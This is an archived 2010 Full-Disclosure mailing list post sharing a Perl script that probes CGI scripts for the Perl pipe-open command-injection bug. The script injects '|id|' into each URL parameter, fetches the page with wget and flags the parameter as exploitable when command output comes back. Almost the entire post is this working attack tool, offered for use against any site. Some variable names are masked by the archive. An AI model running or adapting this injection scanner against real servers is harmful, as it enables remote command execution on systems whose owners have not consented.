[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <AANLkTimkD8zjzo7vDYH-PFWPsdYLn11sLOr2qXBAS6sO@mail.gmail.com>
Date: Sun, 20 Jun 2010 23:43:13 -0400
From: Marshall Whittaker <marshallwhittaker@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: (Almost) Universal perl CGI exploitation
This works on the perl pipe bug. It'll take an arg that's the address of a
website and it's cgi script with some args to the script then figure out if
it can exploit it and how. It's worked on everything I've tried it on,
though I have limited test boxes. It's pretty dirty but it works.
#!/usr/bin/perl
#oxagast
if (@ARGV[0] eq "") {
print " ---=== oxagast's buggy cgi finder ===---\n\n";
print "Please provide a URL with a CGI script and it's args.\n";
print "ex. $0
\"http://www.example.com/cgi-bin/buggy.cgi?file_name=whateverfile.txt&click_num=0&hello=world\"\n";
exit;
}
@urlquestionsplit = split(/\?/, @ARGV[0]);
$baseurl = @urlquestionsplit[0];
@inputafterquestion = split(/\&/, @urlquestionsplit[1]);
for $countargs (0..scalar(@inputafterquestion)) {
$numofargs = $countargs;
}
for $cgiargsplitter (0..$numofargs) {
@cgiaanda = split(/=/, @inputafterquestion[$cgiargsplitter]);
push @cgiargsaftereq, @cgiaanda[1];
}
for $thisarg (0..$numofargs-1) {
$wholestring = @urlquestionsplit[1];
$wholestring =~ s/@...argsaftereq[$thisarg]/\|id|/;
push @urltotest, "$baseurl?$wholestring";
}
for $argnumber (0..$numofargs) {
system("echo \"wget -q -O gettmp \'@...totest[$argnumber]\'\" > getfile.sh");
system("chmod u+x getfile.sh");
system("./getfile.sh");
@gotstuff = `cat gettmp`;
$done = 0;
$exploitable;
for $line (0..scalar(@gotstuff)-1) {
if (@gotstuff[$line] =~ m/uid/) {
if ($done == 0) {
$done = 1;
$firstline = $line;
@gotstuff[$line] =~ m/.*uid(.*)\).*/;
$uidline = "uid$1)";
print "Exploitable...\n";
print "@urltotest[$argnumber]\n";
print "$uidline\n";
unlink(gettemp);
unlink(getfile.sh);
$exploitable = 1;
}
}
}
system("rm gettmp getfile.sh");
}
if ($exploitable == 0) {
print "Sorry, not exploitable...\n";
}
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists